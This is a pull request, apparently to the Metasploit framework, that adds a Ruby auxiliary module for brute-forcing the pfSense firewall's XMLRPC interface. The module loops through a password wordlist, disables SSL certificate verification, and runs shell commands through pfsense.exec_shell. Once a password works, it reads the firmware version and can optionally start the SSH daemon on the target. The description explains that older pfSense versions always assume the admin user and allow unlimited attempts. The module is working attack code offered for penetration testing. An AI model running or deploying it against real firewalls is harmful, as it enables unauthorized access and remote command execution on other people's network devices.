### PR TITLE
Added Auxiliary for pfSense Brute Force

### DIFF
--- a/modules/auxiliary/gather/pfsense_xmlrpc_bruteforce.rb
+++ b/modules/auxiliary/gather/pfsense_xmlrpc_bruteforce.rb
@@ -1,0 +1,60 @@
+##
+# $Id$
+##
+
+require 'msf/core'
+require 'net/https'
+require 'net/http'
+require 'xmlrpc/client'
+
+class Metasploit3 < Msf::Auxiliary
+
+  def initialize(info = {})
+       super(update_info(info,
+           'Name'           => 'PfSense XMLRPC Brute Force',
+           'Description'    => %q{
+                   This module execute Brute Force in XMLRPC Server of PfSense Firewall.
+           },
+           'Author'         => [ 'Neriberto C.Prado <neriberto[at]mundolivre.eti.br>' ],
+           'License'        => BSD_LICENSE,
+           'Version'        => '$Revision: 0.1 $',
+           'Privileged'     => false,
+           'Platform'       => [ 'BSD' ],
+           'DefaultTarget'  => 0
+           ))
+
+       register_options(
+           [
+               OptString.new('RHOST', [ true,  "Remote Host", 'https://192.168.56.10/xmlrpc.php']),
+               OptString.new('PASS_FILE', [ true,  "File containing passwords, one per line", 'passwords.txt']),
+               OptBool.new('START_SSHD',[ false, "Initialize SSH Server when login successful",'false']),
+           ], self.class
+           )
+	end
+
+	def run
+		target = datastore['RHOST']
+		wordlist = datastore['PASS_FILE']
+		::File.open(wordlist, "rb").each_line do |line|
+			print_status("Trying with password: #{line}")
+			server = XMLRPC::Client.new2(target)
+			# no verify ssl certificate
+			server.instance_variable_get(:@http).instance_variable_set(:@verify_mode, OpenSSL::SSL::VERIFY_NONE)
+			result = server.call("pfsense.exec_shell", "#{line.chomp}", "ls -lh")
+			if (result == TRUE)
+				print_status("Password found: #{line.chomp}")
+				result = server.call("pfsense.host_firmware_version", "#{line.chomp}")
+				firmware = result['firmware']['version']
+				print_status("Firmware Version: #{firmware}")
+				if (datastore['START_SSHD'])
+					result = server.call("pfsense.exec_shell", "#{line.chomp}", "/etc/rc.d/sshd onestart")
+					if (result == TRUE)
+						print_status("SSH Server enabling in #{target}")
+					end
+				end
+				break # stop the loop in wordlist
+			end
+		end
+	end
+
+end # for the class definition


### PR DESCRIPTION
This is the auxiliary that was mentioned in Rapid7 Community : https://community.rapid7.com/message/1576#1576

This auxiliary does brute force attacks in pfSense, all versions before of day first of september 2011, suffer brute force attacks trough of the xmlrpc and only need to pass passwords because it always assumes admin user, reducing the attempts ..
